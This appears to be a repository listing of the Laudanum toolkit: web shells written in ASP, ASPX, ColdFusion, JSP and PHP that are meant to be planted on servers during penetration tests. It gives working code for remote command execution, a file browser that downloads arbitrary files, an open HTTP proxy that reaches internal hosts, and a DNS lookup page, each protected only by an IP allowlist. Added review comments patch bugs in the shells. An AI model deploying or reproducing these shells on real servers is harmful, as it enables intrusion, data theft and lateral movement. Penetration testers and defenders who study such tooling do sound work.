88 | <% 89 | 90 | ' dns query types as defined as by windows nslookup 91 | qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",") 92 | qtype = UCase(Request.Form("type")) 93 | 94 | ' see if the query type is valid, if it isn't then set it. 95 | validtype = 0 96 | for i = lbound(qtypes) to ubound(qtypes) 97 | if qtype = qtypes(i) then 98 | validtype = 1 99 | Exit For 100 | end if 101 | next 102 | if validtype = 0 then qtype = "ANY" 103 | 104 | %> 105 |
106 |
107 | DNS Lookup: 108 |

Query: 109 | Type: 121 | 122 |

123 |
124 | <% 125 | 126 | ' get the query 127 | query = trim(Request.Form("query")) 128 | ' the query must be sanitized a bit to try to make sure the shell doesn't hang
' NOTE(review): only spaces and ";" are stripped. qtype is already constrained to the
' fixed list above; query is not. WScript.Shell.Exec hands the string to CreateProcess,
' not cmd.exe, so "&" and "|" are not shell operators here, but the value still reaches
' nslookup's argument list unvalidated (extra "-" options, for one) and is then written
' back into the page unencoded by the Response.Write of command below — reflected XSS for
' anyone who passes the IP check. Restricting query to hostname/IP characters
' ([A-Za-z0-9.\-:]) and wrapping the echo in Server.HTMLEncode would close both.
 129 | query = replace(query, " ", "") 130 | query = replace(query, ";", "") 131 | 132 | if len(query) > 0 then 133 | command = "nslookup -type=" & qtype & " " & query 134 | Set objWShell = Server.CreateObject("WScript.Shell") 135 | Set objCmd = objWShell.Exec(command)
' NOTE(review): only StdOut is drained. If nslookup writes enough to StdErr to fill its
' pipe, ReadAll can block for the lifetime of the request.
 136 | strPResult = objCmd.StdOut.Readall() 137 | set objCmd = nothing: Set objWShell = nothing 138 | %>
<%
139 | 	Response.Write command & "
" 140 | Response.Write replace(strPResult,vbCrLf,"
") 141 | %>
<% 142 | end if 143 | %> 144 |
145 |
146 | Copyright © 2014, Kevin Johnson and the Laudanum team.
147 | Written by Tim Medin.
148 | Get the latest version at laudanum.secureideas.net. 149 |
150 | 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /laudanum/asp/file.asp: -------------------------------------------------------------------------------- 1 | <%@Language="VBScript"%> 2 | <%Option Explicit%> 3 | <%Response.Buffer = True%> 4 | <% 5 | ' ******************************************************************************* 6 | ' *** 7 | ' *** Laudanum Project 8 | ' *** A Collection of Injectable Files used during a Penetration Test 9 | ' *** 10 | ' *** More information is available at: 11 | ' *** http://laudanum.secureideas.net 12 | ' *** laudanum@secureideas.net 13 | ' *** 14 | ' *** Project Leads: 15 | ' *** Kevin Johnson 17 | ' *** 18 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 19 | ' *** 20 | ' ******************************************************************************** 21 | ' *** 22 | ' *** This file provides access to the file system. 23 | ' *** Written by Tim Medin 24 | ' *** 25 | ' ******************************************************************************** 26 | ' *** This program is free software; you can redistribute it and/or 27 | ' *** modify it under the terms of the GNU General Public License 28 | ' *** as published by the Free Software Foundation; either version 2 29 | ' *** of the License, or (at your option) any later version. 30 | ' *** 31 | ' *** This program is distributed in the hope that it will be useful, 32 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | ' *** GNU General Public License for more details. 35 | ' *** 36 | ' *** You can get a copy of the GNU General Public License from this 37 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | ' *** You can also write to the Free Software Foundation, Inc., Temple 39 | ' *** Place - Suite Boston, MA USA. 
40 | ' *** 41 | ' ***************************************************************************** */ 42 | 43 | ' ***************** Config entries below *********************** 44 | 45 | ' Define variables 46 | Dim allowedIPs 47 | Dim allowed 48 | Dim filepath 49 | Dim file 50 | Dim stream 51 | Dim path 52 | Dim i 53 | Dim fso 54 | Dim folder 55 | Dim list 56 | Dim temppath 57 | 58 | ' IPs are enterable as individual addresses TODO: add CIDR support 59 | allowedIPs = "192.168.0.1,127.0.0.1,::1" 60 | ' Just in cace you added a space in the line above 61 | allowedIPs = replace(allowedIPS," ","") 62 | 'turn it into an array 63 | allowedIPs = split(allowedIPS,",") ' 64 | ' make sure the ip is allowed 65 | allowed = 0 66 | for i = lbound(allowedIPs) to ubound(allowedIPs) 67 | if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then 68 | allowed = 1 69 | exit for 70 | end if 71 | next 72 | ' send a 404 if the IP Address is not allowed 73 | if allowed = 0 then 74 | Response.Status = "404 File Not Found" 75 | Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) 76 | Response.End 77 | end if 78 | 79 | ' create file object for use everywhere 80 | set fso = CreateObject("Scripting.FileSystemObject") 81 | 82 | ' download a file if selected 83 | filepath = trim(Request.QueryString("file")) 84 | 'validate file 85 | if len(filepath) > 0 then 86 | if fso.FileExists(filepath) then 87 | 'valid file 88 | 89 | Set file = fso.GetFile(filepath) 90 | Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name 91 | 'Response.AddHeader "Content-Length", file.Size 92 | Response.ContentType = "application/octet-stream" 93 | set stream = Server.CreateObject("ADODB.Stream") 94 | stream.Open 95 | stream.Type = 1 96 | Response.Charset = "UTF-8" 97 | stream.LoadFromFile(file.Path) 98 | ' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb. 
99 | Response.BinaryWrite(stream.Read) 100 | stream.Close 101 | set stream = Nothing 102 | set file = Nothing 103 | Response.End 104 | end if 105 | end if 106 | 107 | ' begin rendering the page 108 | %> 109 | 110 | 111 | Laudanum ASP File Browser 112 | 113 | 114 | 115 |

Laudanum File Browser 0.1

116 | 117 | <% 118 | ' get the path to work with, if it isn't set or valid then start with the web root 119 | ' goofy if statement is used since vbscript doesn't use short-curcuit logic 120 | path = trim(Request.QueryString("path")) 121 | if len(path) = 0 then 122 | path = fso.GetFolder(Server.MapPath("\")) 123 | elseif not fso.FolderExists(path) then 124 | path = fso.GetFolder(Server.MapPath("\")) 125 | end if 126 | 127 | set folder = fso.GetFolder(path) 128 | 129 | ' Special locations, webroot and drives 130 | %>Other Locations: <% 131 | for each i in fso.Drives 132 | if i.IsReady then 133 | %><%=i.DriveLetter%>:  <% 134 | end if 135 | next 136 | %>">web root
<% 137 | 138 | ' Information on folder 139 | %>

Listing of: <% 140 | list = split(folder.path, "\") 141 | temppath = "" 142 | for each i in list 143 | temppath = temppath & i & "\" 144 | %><%=i%>\ <% 145 | next 146 | %>

<% 147 | 148 | ' build table for listing 149 | %> 150 | <% 151 | ' Parent Path if it exists 152 | if not folder.IsRootFolder then 153 | %><% 154 | end if 155 | 156 | ' Get the folders 157 | set list = folder.SubFolders 158 | for each i in list 159 | %><% 160 | next 161 | 162 | ' Get the files 163 | set list = folder.Files 164 | for each i in list 165 | %><% 166 | next 167 | 168 | ' all done 169 | %> 170 |
NameSizeModifiedAccessedCreated
..
<%=i.Name%>\
<%=i.Name%><%=FormatNumber(i.Size, 0)%><%=i.DateLastModified%><%=i.DateLastAccessed%><%=i.DateCreated%>
171 |
172 |
173 | Copyright © 2014, Kevin Johnson and the Laudanum team.
174 | Written by Tim Medin.
175 | Get the latest version at laudanum.secureideas.net. 176 |
177 | 178 | 179 | 180 | -------------------------------------------------------------------------------- /laudanum/asp/proxy.asp: -------------------------------------------------------------------------------- 1 | <%@Language="VBScript"%> 2 | <%Option Explicit%> 3 | <%Response.Buffer = True%> 4 | <% 5 | ' ******************************************************************************* 6 | ' *** 7 | ' *** Laudanum Project 8 | ' *** A Collection of Injectable Files used during a Penetration Test 9 | ' *** 10 | ' *** More information is available at: 11 | ' *** http://laudanum.secureideas.net 12 | ' *** laudanum@secureideas.net 13 | ' *** 14 | ' *** Project Leads: 15 | ' *** Kevin Johnson 17 | ' *** 18 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 19 | ' *** 20 | ' ******************************************************************************** 21 | ' *** 22 | ' *** This file provides access as a proxy. 23 | ' *** Written by Tim Medin 24 | ' *** 25 | ' ******************************************************************************** 26 | ' *** This program is free software; you can redistribute it and/or 27 | ' *** modify it under the terms of the GNU General Public License 28 | ' *** as published by the Free Software Foundation; either version 2 29 | ' *** of the License, or (at your option) any later version. 30 | ' *** 31 | ' *** This program is distributed in the hope that it will be useful, 32 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | ' *** GNU General Public License for more details. 35 | ' *** 36 | ' *** You can get a copy of the GNU General Public License from this 37 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | ' *** You can also write to the Free Software Foundation, Inc., Temple 39 | ' *** Place - Suite Boston, MA USA. 
40 | ' *** 41 | ' ***************************************************************************** */ 42 | 43 | ' ***************** Config entries below *********************** 44 | 45 | ' Define variables 46 | Dim allowedIPs 47 | Dim allowed 48 | Dim i 49 | Dim s 'generic string, yeah, I know bad, but at this point I just want it to work 50 | Dim urltemp 51 | Dim urlscheme 52 | Dim urlhost 53 | Dim urlport 54 | Dim urlpath 55 | Dim urlfile 56 | Dim urlquery 57 | Dim http 58 | Dim method 59 | Dim contenttype 60 | Dim stream 61 | Dim regex 62 | Dim body 63 | Dim params 64 | 65 | function err_handler() 66 | %> 67 | 68 | 69 | Laudanum ASP Proxy 70 | 71 | 72 |

Fatal Error!

73 | <%=Err.Number%>
74 | <%=Err.Message%>
75 |
76 |
77 | Copyright © 2014, Kevin Johnson and the Laudanum team.
78 | Written by Tim Medin.
79 | Get the latest version at laudanum.secureideas.net. 80 |
81 | 82 | <% 83 | end function 84 | 85 | function CleanQueryString 86 | ' removes laudurl from the querystring 87 | Dim i 88 | Dim j 89 | Dim s 90 | Dim key 91 | Dim q 92 | 93 | 94 | if len(request.querystring) = 0 then 95 | CleanQueryString = "" 96 | exit function 97 | end if 98 | 99 | ' build the request parameters 100 | for i = 1 to request.querystring.count 101 | key = request.querystring.key(i) 102 | 'response.write "
key:" & key 103 | if key = "laudurl" then 104 | ' if the key is laudurl, we need check if there is a ? in the string since 105 | ' it may have its own query string that doesn't get parsed properly. 106 | s = split(request.querystring("laudurl"), "?") 107 | if ubound(s) > lbound(s) then 108 | ' laudurl contains a ?, it must be manually parsed 109 | key = left(s(1), instr(s(1), "=") - 1) 110 | q = q & "&" & key & "=" & mid(s(1), len(key) + 2) 111 | end if 112 | else 113 | for j = 1 to request.querystring(key).count 114 | 'response.write "
-value:" & request.querystring(key)(j) 115 | q = q & "&" & key & "=" & request.querystring(key)(j) 116 | next 117 | end if 118 | next 119 | 120 | if len(q) > 0 then 121 | CleanQueryString = "?" & mid(q, 2) 122 | else 123 | CleanQueryString = "" 124 | end if 125 | end function 126 | 127 | function CleanFormValues() 128 | Dim r 129 | Set r = New RegExp 130 | r.IgnoreCase = true 131 | r.Global = true 132 | 133 | ' remove the laudurl paramater 134 | r.Pattern = "laudurl=[^&]+($|&)" 135 | CleanFormValues = r.Replace(request.form, "") 136 | Set r = nothing 137 | end function 138 | 139 | sub ParseUrl() 140 | ' parses the url into the global variables 141 | Dim urltemp 142 | Dim url 143 | 144 | 'get the url, it may be in the querystring for a get or from a form in a post 145 | url = Request.QueryString("laudurl") 146 | if url = "" then 147 | url = Request.Form("laudurl") 148 | end if 149 | 150 | if url = "" then 151 | urlscheme = "" 152 | urlhost = "" 153 | urlport = "" 154 | urlpath = "" 155 | urlfile = "" 156 | urlquery = "" 157 | exit sub 158 | end if 159 | 160 | ' Parse the url and break it into its components 161 | ' this is done so it can be used to rewrite the page 162 | 163 | ' ensure the url has a scheme, if it doesn't then assume http 164 | if instr(url,"://") = 0 then url = "http://" + url 165 | 166 | ' Get the scheme 167 | urlscheme = split(url, "://")(0) & "://" 168 | 169 | ' urltemp is used to hold the remainder of the url as each portion is parsed 170 | urltemp = mid(url, len(urlscheme) + 1) 171 | 'get the host 172 | if instr(urltemp, "/") = 0 then 173 | ' there is no path so all that is left is the host 174 | urlhost = urltemp 175 | urlport = "" 176 | urlpath = "/" 177 | urlfile = "" 178 | urlport = "" 179 | else 180 | ' there is more that just the hostname remaining 181 | urlhost = left(urltemp, instr(urltemp, "/") - 1) 182 | urltemp = mid(urltemp, len(urlhost) + 1) 183 | 184 | ' is there a port 185 | if instr(urlhost, ":") = 0 then 186 | ' no port 187 | 
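urlport = ""
else
    ' there is a port
    ' proxy.asp runs under Option Explicit (line 2) and arr was never declared —
    ' neither in the page-level Dims nor in ParseUrl — so any laudurl carrying an
    ' explicit port (host:8080/...) failed here with "Variable is undefined: 'arr'"
    ' before the request was ever sent. Declared locally; scope is the whole Sub.
    Dim arr
    arr = split(urlhost, ":")
    urlhost = arr(0)
    urlport = ":" & arr(1)
end if

' all that is left is the path and the query
' is there a query? (the query string itself is rebuilt later by CleanQueryString)
if instr(urltemp, "?") = 0 then
    ' no query
    urlpath = urltemp
    'urlquery = ""
else
    'Response.Write "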

" & urltemp & "

" 203 | urlpath = left(urltemp, instr(urltemp, "?") - 1) 204 | 'urlquery = mid(urltemp, instr(urltemp, "?") + 1) 205 | end if 206 | 207 | if right(urlpath, 1) = "/" then 208 | urlfile = "" 209 | else 210 | ' we need to get the path and the file 211 | urltemp = split(urlpath, "/") 212 | urlfile = urltemp(ubound(urltemp)) 213 | urlpath = left(urlpath, len(urlpath) - len(urlfile)) 214 | end if 215 | end if 216 | 217 | urlquery = CleanQueryString 218 | 219 | 'response.write "
scheme: " & urlscheme 220 | 'response.write "
host: " & urlhost 221 | 'response.write "
port: " & urlport 222 | 'response.write "
path: " & urlpath 223 | 'response.write "
file: " & urlfile 224 | 'response.write "
query: " & urlquery 225 | 'response.write "
full: " & FullUrl() 226 | 'response.end 227 | end sub 228 | 229 | function FullUrl() 230 | FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery 231 | end function 232 | 233 | sub RewriteHeaders() 234 | Dim i 235 | Dim header 236 | Dim headervalue 237 | Dim regexdomain 238 | Dim regexpath 239 | 240 | ' setup a regular expression to clean the cookie's domain and path 241 | Set regexdomain = New RegExp 242 | regexdomain.IgnoreCase = true 243 | regexdomain.Global = true 244 | ' rewrite images and links - absolute reference 245 | regexdomain.Pattern = "domain=[\S]+" 246 | 247 | Set regexpath = New RegExp 248 | regexpath.IgnoreCase = true 249 | regexpath.Global = true 250 | ' rewrite images and links - absolute reference 251 | regexpath.Pattern = "path=[\S]+" 252 | 253 | ' go through each header 254 | for each i in Split(http.getAllResponseHeaders, vbLf) 255 | ' Break on the \x0a and remove the \x0d if it exists 256 | i = Replace(i, vbCr, "") 257 | ' make sure it is a header and value 258 | if instr(i, ":") > 0 then 259 | ' break the response headers into header and value 260 | header = trim(Left(i, instr(i, ":") - 1)) 261 | header = replace(header, "_", "-") 262 | headervalue = trim(Right(i, len(i) - instr(i, ":"))) 263 | 264 | ' don't add these two header types since they are handled automatically 265 | if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then 266 | if lcase(header) = "set-cookie" then 267 | ' strip the domain from the cookie 268 | headervalue = regexdomain.replace(headervalue, "") 269 | ' strip the path from the cookie 270 | headervalue = regexpath.replace(headervalue, "") 271 | headervalue = trim(headervalue) 272 | end if 273 | response.AddHeader header, headervalue 274 | end if 275 | end if 276 | next 277 | 278 | Set regexdomain = nothing 279 | Set regexpath = nothing 280 | end sub 281 | 282 | ' TODO: Add authentication support so it will work behind a proxy 283 | ' IPs 
are enterable as individual addresses TODO: add CIDR support 284 | allowedIPs = "192.168.0.1,127.0.0.1,::1" 285 | ' Just in case you added a space in the line above 286 | allowedIPs = replace(allowedIPS," ","") 287 | 'turn it into an array 288 | allowedIPs = split(allowedIPS,",") ' 289 | ' make sure the ip is allowed 290 | ' allowed starts at 0 so the allowlist is enforced; the earlier "it is 1 for testing" TODO was stale. Keep it 0.
 291 | allowed = 0 292 | for i = lbound(allowedIPs) to ubound(allowedIPs) 293 | if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then 294 | allowed = 1 295 | exit for 296 | end if 297 | next 298 | ' send a 404 if the IP Address is not allowed 299 | if allowed = 0 then 300 | Response.Status = "404 File Not Found" 301 | Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) 302 | Response.End 303 | end if 304 | 305 | 306 | 'initialize variables 307 | Set http = nothing 308 | Set regex = nothing 309 | Set stream = nothing 310 | 311 | ' Define Constants 312 | const useMSXML2 = 0 313 | const chunkSize = 1048576 ' 1MB 314 | 315 | ' parse the url into its parts
' NOTE(review): laudurl is taken as-is (ParseUrl only prepends "http://" when no scheme is
' present) — there is no scheme, host or port restriction, so this page fetches anything
' the IIS host can reach, including loopback and internal services that are not exposed
' externally. That is the tool's purpose, but the IP allowlist above is the only gate.
 316 | ParseUrl() 317 | 318 | ' check if there is a valid url 319 | if len(FullUrl) = 0 then 320 | ' no url to proxy, give `em the boring default page 321 | 322 | ' Default layout of the page 323 | ' First thing you get when you hit the page without giving it a URL 324 | %> 325 | 326 | 327 | Laudanum ASP Proxy 328 | 333 | 334 | 335 | 336 |

Laudanum ASP Proxy

337 | 338 |
"> 339 | 340 | 341 |
342 |
343 |
344 | Copyright © 2014, Kevin Johnson and the Laudanum team.
345 | Written by Tim Medin.
346 | Get the latest version at laudanum.secureideas.net. 347 |
348 | 349 | <% 350 | 351 | Response.End() 352 | end if 353 | 354 | ' Let's get our Proxy on!!! 355 | ' define the request type 356 | if useMSXML2 = 1 then 357 | Set http = Server.CreateObject("MSXML2.XMLHTTP") 358 | else 359 | Set http = Server.CreateObject("Microsoft.XMLHTTP") 360 | end if 361 | 362 | ' get the request type 363 | method = Request.ServerVariables("REQUEST_METHOD") 364 | 365 | ' setup the request, false means don't send it yet 366 | http.Open method, FullUrl, False 367 | 368 | ' send the request 369 | if method = "POST" then 370 | params = CleanFormValues 371 | http.setRequestHeader "Content-type", "application/x-www-form-urlencoded" 372 | http.setRequestHeader "Content-length", len(params) 373 | http.setRequestHeader "Connection", "close" 374 | http.Send(params) 375 | else 376 | http.Send 377 | end if 378 | 379 | ' Replace the normal headers with the ones from the response 380 | Response.Clear 381 | contenttype = http.getResponseHeader("Content-Type") 382 | Response.ContentType = contenttype 383 | 384 | ' rewrite the headers. Takes headers and passes them to new request 385 | RewriteHeaders() 386 | 387 | ' how to respond? is it text or is it something else? 
388 | if lcase(left(contenttype, 4)) = "text" then 389 | ' response is text, so we need to rewrite it, but that's later 390 | 391 | 392 | ' do the rewriting 393 | body = http.responseText 394 | 395 | Set regex = New RegExp 396 | regex.IgnoreCase = true 397 | regex.Global = true 398 | 399 | ' rewrite images and links - absolute reference 400 | s = urlscheme & urlhost & urlport 401 | regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])" 402 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 403 | 404 | ' rewrite images and links - full reference 405 | regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])" 406 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3") 407 | 408 | ' rewrite images and links - absolute reference 409 | s = urlscheme & urlhost & urlport & urlpath 410 | regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])" 411 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 412 | 413 | 414 | ' rewrite forms - absolute reference 415 | s = urlscheme & urlhost & urlport 416 | regex.Pattern = "(\]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])" 417 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") 418 | 419 | ' rewrite forms - full reference 420 | regex.Pattern = "(\]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])" 421 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") 422 | 423 | ' rewrite forms - absolute reference 424 | s = urlscheme & urlhost & urlport & urlpath 425 | regex.Pattern = "(\]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])" 426 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") 427 | 428 | Response.Write(body) 429 | 430 | Set regex = nothing 431 | else 432 | ' some sort of binary response, so stream it 433 | Set stream = nothing 434 | Set stream = Server.CreateObject("ADODB.Stream") 435 | stream.Type 
= 1 'Binary 436 | stream.Open 437 | stream.Write http.responseBody 438 | stream.Position = 0 439 | 440 | For i = 0 to stream.Size \ chunkSize 441 | Response.BinaryWrite(stream.Read(chunkSize)) 442 | next 443 | Set stream = nothing 444 | end if 445 | 446 | Set http = nothing 447 | 448 | Response.End 449 | 450 | :HandleError 451 | err_handler
' NOTE(review): this tail is unreachable and err_handler is never invoked — Response.End
' above terminates the script, VBScript has no labels or On Error GoTo, and no
' "On Error Resume Next" appears anywhere in this file. A failure in http.Send or the
' stream code therefore surfaces as the default ASP 500 page, not the Laudanum error page.
 452 | 453 | %> 454 | 455 | -------------------------------------------------------------------------------- /laudanum/asp/shell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson 14 | ' *** 15 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** Updated and fixed by Robin Wood 20 | ' *** Updated and fixed by Tim Medin "1.2.3.4" then 47 | response.Status="404 Page Not Found" 48 | response.Write(response.Status) 49 | response.End 50 | end if 51 | 52 | if Request.Form("submit") <> "" then 53 | Dim wshell, intReturn, strPResult 54 | cmd = Request.Form("cmd")
' NOTE(review): cmd is written straight back into the page — reflected XSS for any caller
' who passes the IP check. Wrap it in Server.HTMLEncode(cmd), as the replace() on the
' command output below already intends to do for "<".
 55 | Response.Write ("Running command: " & cmd & "
") 56 | set wshell = CreateObject("WScript.Shell") 57 | Set objCmd = wShell.Exec(cmd) 58 | strPResult = objCmd.StdOut.Readall() 59 | 60 | response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" 61 | 62 | set wshell = nothing 63 | end if 64 | 65 | %> 66 | 67 | Laundanum ASP Shell 68 | 69 |
70 | Command:
71 | 72 |

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 73 |

Example command to do a directory listing:
74 | %ComSpec% /c dir 75 |

76 |
77 |
78 | Copyright © 2014, Kevin Johnson and the Laudanum team.
79 | Written by Tim Medin.
80 | Get the latest version at laudanum.secureideas.net. 81 |
82 | 83 | 84 | -------------------------------------------------------------------------------- /laudanum/aspx/shell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#"%> 2 | <%@ Import Namespace="System" %> 3 | 4 | 103 | 104 | Laundanum ASPX Shell 105 | 106 | 107 |
108 | cmd /c 109 |
110 | STDOUT:
111 |
<% = stdout.Replace("<", "<") %>
112 |
113 |
114 |
115 | STDERR:
116 |
<% = stderr.Replace("<", "<") %>
117 | 118 | 119 |
120 | 121 |
122 |
123 | Copyright © 2014, Kevin Johnson and the Laudanum team.
124 | Written by Tim Medin.
125 | Get the latest version at laudanum.secureideas.net. 126 |
127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /laudanum/cfm/shell.cfm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | Laudanum Coldfusion Shell 65 | 66 |
67 | 68 | Executable: For Windows use: cmd.exe or the full path to cmd.exe
69 | Arguments: For Windows use: /c command
70 | 71 | Executable:
72 | Arguments:
73 |
74 | 75 | 76 | 77 |
78 | 79 | 80 | 81 | 82 | 83 |
 84 |     
 85 |     #Replace(foo, "<", "<", "All")#
 86 |     
87 |
88 | 89 | Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. 90 | 91 |
92 |
93 | Copyright © 2014, Kevin Johnson and the Laudanum team.
94 | Written by Tim Medin.
95 | Bug fixes by Matt Presson
96 | Get the latest version at laudanum.secureideas.net. 97 |
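98 | 99 | 100 | -------------------------------------------------------------------------------- /laudanum/jsp/cmd.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jbarcia/Web-Shells/599cae3d6c134e98d7f7384ba3e88a5114cf4c88/laudanum/jsp/cmd.war -------------------------------------------------------------------------------- /laudanum/jsp/makewar.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | jar -cvf cmd.war warfiles/* 4 | -------------------------------------------------------------------------------- /laudanum/jsp/warfiles/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: 1.6.0_10 (Sun Microsystems Inc.) 3 | 4 | -------------------------------------------------------------------------------- /laudanum/jsp/warfiles/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | Command 9 | /cmd.jsp 10 | 11 | 12 | -------------------------------------------------------------------------------- /laudanum/jsp/warfiles/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | /* Gate on the caller's address. Fixed: the original compared with "!=" on a String, which tests object identity rather than content, so the check never matched the configured address and every request got a 404; the sendError() statement after it also lacked its ';'. REMOTE_ADDR is the TCP peer — behind a reverse proxy it is the proxy's own address, and X-Forwarded-For is client-controlled, so do not substitute it. */ 4 | if (!"4.4.4.4".equals(request.getRemoteAddr())) { 5 | response.sendError(HttpServletResponse.SC_NOT_FOUND); 6 | return; 7 | } 8 | 9 | %> 10 | 11 | Laudanum JSP Shell 12 | 13 | Commands with JSP 14 |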
15 | 16 |
17 | If you use this against a Windows box you may need to prefix your command with cmd.exe /c 18 |
19 |
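<%
// Run the submitted command and print what it writes to stdout.
// Everything reflected into the page here is request-controlled, so it is
// HTML-escaped first: the original echoed the command and its output raw
// (reflected XSS for anyone who passes the IP check) and read stdout through
// the deprecated DataInputStream.readLine(), which also mangles non-ASCII output.
if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    // NOTE(review): the element between "Command: " and the output was lost in this
    // listing; a <br> is assumed here, matching the other Laudanum shells — confirm.
    out.println("Command: " + cmd.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;") + "<br>");
    // Runtime.exec(String) splits on whitespace and does not involve a shell, which is
    // why the page tells Windows users to prefix "cmd.exe /c" for shell syntax.
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader stdout = new BufferedReader(new InputStreamReader(p.getInputStream()));
    try {
        String line;
        while ((line = stdout.readLine()) != null) {
            out.println(line.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;"));
        }
    } finally {
        // stderr is never read (as in the original); a command that writes a lot to it
        // can still block on a full pipe.
        stdout.close();
    }
}
%>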
35 |
36 |
37 | Copyright © 2014, Kevin Johnson and the Laudanum team.
38 | Written by Tim Medin.
39 | Get the latest version at laudanum.secureideas.net. 40 |
41 | 42 | -------------------------------------------------------------------------------- /laudanum/php/dns.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides access to DNS on the system. 20 | *** Written by Tim Medin 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 
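37 | *** 38 | ***************************************************************************** */ 39 | 40 | // ***************** Config entries below *********************** 41 | 42 | // IPs are enterable as individual addresses TODO: add CIDR support
/* NOTE(review): "19.168.2.16" is a public-range address; if 192.168.2.16 was meant, that
   entry never matches. The comparison is exact string equality against REMOTE_ADDR, which
   is the TCP peer — behind a reverse proxy that is the proxy's own address; do not fall
   back to the client-controlled X-Forwarded-For header. */
 43 | $allowedIPs = array("19.168.2.16", "192.168.1.100"); 44 | 45 | # *********** No editable content below this line ************** 46 | 47 | $allowed = 0; 48 | foreach ($allowedIPs as $IP) { 49 | if ($_SERVER["REMOTE_ADDR"] == $IP) 50 | $allowed = 1; 51 | } 52 | 53 | if ($allowed == 0) { 54 | header("HTTP/1.0 404 Not Found"); 55 | die(); 56 | } 57 | 58 | 59 | 60 | /* This error handler will turn all notices, warnings, and errors into fatal
 * errors, unless they have been suppressed with the @-operator.
 *
 * $errcontext is optional: PHP 7.2 deprecated it and PHP 8 calls handlers with four
 * arguments, so a required fifth parameter would raise ArgumentCountError on the first
 * notice. $errstr/$errfile are HTML-escaped before being echoed because a warning's
 * text can carry request-derived input (the queried name, for one). */ 62 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext = null) { 63 | /* The @-operator temporarily makes
 * error_reporting() return zero, and we don't want to die in that case.
 * We do note the error in the output, though — although nothing in this file starts a
 * session or reads $_SESSION['output'], so that text is effectively dropped, and no
 * chdir() call is visible here despite the original comment.
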